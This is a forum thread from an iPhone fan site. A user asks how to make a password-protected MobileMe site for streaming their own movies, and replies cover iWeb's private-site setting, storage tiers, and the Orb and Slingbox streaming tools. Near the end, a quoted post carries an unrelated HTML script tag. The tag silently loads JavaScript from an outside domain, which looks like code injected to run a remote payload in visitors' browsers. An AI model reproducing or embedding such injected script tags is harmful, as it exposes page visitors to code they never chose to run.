Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: New Streaming site with pass.

Default New Streaming site with pass.
    hey quys.
    i just gonna buy me mobile me and with this package i'll get 200 gb of free space. could i upload my movies and link theme to my own iphone streaming site. so i dont want others to stream the videos and share the videos.

Would be possible to get the site with a passwort so just i can stream them without getting theme on my iphone with pc

Greetings and sorry for my bad english

What's Jailbreak?
    Thanks

Yes this is actually a very easy process. If you have iWeb, (I believe iWeb '06 supports it but I have '08 now so I don't remember) you can open the inspector and go to the site preferences panel. It's in the first tab. Now, select password from the inspector window. Finally, select"Make my published siteprivate", type in your password, and upload your content to MobileMe.com. Need any more assistance? Email me at [email protected]. Or, private message me on the forums.

Thanks!
    Thurbs190

Thanks
    Thanked 1,086 Times in 224 Posts

To my knowledge and experience with "MobileMe" you cannot stream from the files like movies from the MobileMe servers to the iphone. I could Be wrong tho

plain jane vanilla (post count restored to FULL AWESOMENESS) cpjr's Avatar
    Thanks
    Thanked 1,461 Times in 1,264 Posts

You can stream them from your PC to the iphone using something like OrbLive. I do all the time, works better (IMO) all you gotta do is keep your PC on.

Tell me how its goes i might want to do it

you can stream from mobile me i have it and i putup movies like music videos on there and i watch it on my phone it has to be formated right tho.. also you dont get 200gigs lol

20 GB Storage / 200 GB Monthly Data Transfer
    40 GB Storage / 400 GB Monthly Data Transfer
    60 GB Storage / 600 GB Monthly Data Transfer

Thanks

^Yup that works fine.

I prefer using Orb cause theres no limit to data transfer and you dont have to upload the videos anywhere...like you upload them to MobileMe.

Easy setup, install Orb on iphone, install on PC. Little setup and your done. Same as MobileMe in the fact that the videos have to be formatted properly...I use .avi works perfect.

i used to like orb but i hate the fact you have to leave your pc running to get to your videos.. So i went with singbox and i hope they come out with an app soon..

Thanks

^True, thats the only "bad" part. But mine's on most of the time anyways so doesnt really matter.

Quote Originally Posted by herrcool View Post
    hey quys.
    i just gonna buy me mobile me and with this package i'll get 200 gb of free space. could i upload my movies and link theme to my own iphone streaming site. so i dont want others to stream the videos and share the videos.

Would be possible to get the site with a passwort so just i can stream them without getting theme on my iphone with pc

Greetings and sorry for my bad english<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    just link it to your PC or Your MAC Itunes will do the rest